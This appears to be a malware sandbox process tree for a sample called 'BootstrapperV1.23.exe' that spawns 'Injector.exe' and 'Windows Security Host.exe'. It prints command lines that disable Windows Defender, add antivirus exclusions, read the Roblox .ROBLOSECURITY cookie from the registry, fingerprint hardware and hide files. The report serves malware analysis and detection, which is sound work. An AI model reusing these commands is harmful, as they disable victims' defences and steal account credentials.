C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3944
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4636
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious behavior: EnumeratesProcesses
PID:396
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2788
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4904
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp35CC.tmp.bat""3⤵PID:2036
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:1996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"3⤵
- Executes dropped EXE
PID:1684
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"4⤵
- Executes dropped EXE
PID:2708
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"4⤵
- Executes dropped EXE
PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"5⤵
- Executes dropped EXE
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"5⤵
- Executes dropped EXE
PID:1028
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2300 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵
- Suspicious behavior: EnumeratesProcesses
PID:2780
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"7⤵
- Views/modifies file attributes
PID:1560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 27⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1460
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3912
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1028
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid7⤵PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER7⤵
- Command and Scripting Interpreter: PowerShell
PID:2332
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name7⤵
- Detects videocard installed
PID:2908
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause7⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3584 -
C:\Windows\system32\PING.EXEping localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"6⤵
- Executes dropped EXE
PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"6⤵
- Checks computer location settings
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"7⤵
- Executes dropped EXE
PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"7⤵
- Executes dropped EXE
PID:748
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"7⤵
- Checks computer location settings
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"8⤵
- Executes dropped EXE
PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"8⤵
- Executes dropped EXE
PID:3736
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"8⤵
- Checks computer location settings
PID:3144 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"9⤵
- Executes dropped EXE
PID:2860
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"9⤵
- Executes dropped EXE
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"9⤵
- Checks computer location settings
PID:3856 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"10⤵
- Executes dropped EXE
PID:3976
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"10⤵
- Executes dropped EXE
PID:1372
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"10⤵
- Checks computer location settings
PID:3908 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"11⤵
- Executes dropped EXE
PID:4788
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"11⤵
- Executes dropped EXE
PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"11⤵
- Checks computer location settings
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"12⤵
- Executes dropped EXE
PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"12⤵
- Executes dropped EXE
PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"12⤵
- Checks computer location settings
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"13⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4588 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid14⤵PID:3344
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"14⤵
- Views/modifies file attributes
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'14⤵
- Command and Scripting Interpreter: PowerShell
PID:8
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 214⤵PID:5004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY14⤵
- Command and Scripting Interpreter: PowerShell
PID:1648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY14⤵PID:2596
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption14⤵PID:1692
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory14⤵PID:2800
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid14⤵PID:3904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER14⤵
- Command and Scripting Interpreter: PowerShell
PID:3152
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name14⤵
- Detects videocard installed
PID:4052
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause14⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4432 -
C:\Windows\system32\PING.EXEping localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"13⤵
- Executes dropped EXE
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"13⤵
- Checks computer location settings
PID:216 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"14⤵
- Executes dropped EXE
PID:1380
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"14⤵
- Executes dropped EXE
PID:2864
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"14⤵
- Checks computer location settings
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"15⤵
- Executes dropped EXE
PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"15⤵
- Executes dropped EXE
PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"15⤵
- Checks computer location settings
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"16⤵
- Executes dropped EXE
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"16⤵
- Executes dropped EXE
PID:2820
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"16⤵
- Checks computer location settings
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"17⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4172 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid18⤵PID:3984
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"18⤵
- Views/modifies file attributes
PID:868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'18⤵
- Command and Scripting Interpreter: PowerShell
PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 218⤵
- Command and Scripting Interpreter: PowerShell
PID:4308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY18⤵
- Command and Scripting Interpreter: PowerShell
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY18⤵PID:1460
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption18⤵PID:3460
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory18⤵PID:4456
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid18⤵PID:3548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER18⤵
- Command and Scripting Interpreter: PowerShell
PID:3740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name18⤵
- Detects videocard installed
PID:4468
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause18⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3144 -
C:\Windows\system32\PING.EXEping localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"17⤵
- Executes dropped EXE
PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"17⤵
- Checks computer location settings
PID:2780 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"18⤵
- Executes dropped EXE
PID:4092
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"18⤵
- Executes dropped EXE
PID:736
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"18⤵
- Checks computer location settings
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"19⤵
- Executes dropped EXE
PID:228
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"19⤵
- Executes dropped EXE
PID:2040
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"19⤵
- Checks computer location settings
PID:416 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"20⤵
- Executes dropped EXE
PID:3084
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"20⤵
- Executes dropped EXE
PID:3856
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"20⤵
- Checks computer location settings
PID:5088 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"21⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:872 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid22⤵PID:4580
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"22⤵
- Views/modifies file attributes
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'22⤵
- Command and Scripting Interpreter: PowerShell
PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 222⤵PID:3700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY22⤵PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY22⤵PID:416
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption22⤵PID:3728
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory22⤵PID:696
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid22⤵PID:3764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER22⤵
- Command and Scripting Interpreter: PowerShell
PID:2296
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name22⤵
- Detects videocard installed
PID:4876
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause22⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1984 -
C:\Windows\system32\PING.EXEping localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"21⤵
- Executes dropped EXE
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"21⤵
- Checks computer location settings
PID:3908 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"22⤵
- Executes dropped EXE
PID:3068
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"22⤵
- Executes dropped EXE
PID:5052
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"22⤵
- Checks computer location settings
PID:2444 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"23⤵
- Executes dropped EXE
PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"23⤵
- Executes dropped EXE
PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"23⤵
- Checks computer location settings
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"24⤵
- Executes dropped EXE
PID:4968
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"24⤵
- Executes dropped EXE
PID:2056
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"24⤵
- Checks computer location settings
PID:388 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"25⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:1928 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid26⤵PID:3164
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"26⤵
- Views/modifies file attributes
PID:4136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'26⤵
- Command and Scripting Interpreter: PowerShell
PID:3568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 226⤵
- Command and Scripting Interpreter: PowerShell
PID:736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY26⤵
- Command and Scripting Interpreter: PowerShell
PID:4000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY26⤵PID:3632
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption26⤵PID:3516
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory26⤵PID:2056
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid26⤵PID:4156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER26⤵
- Command and Scripting Interpreter: PowerShell
PID:776
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name26⤵
- Detects videocard installed
PID:3220
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause26⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2064 -
C:\Windows\system32\PING.EXEping localhost27⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"25⤵
- Executes dropped EXE
PID:456
-
-
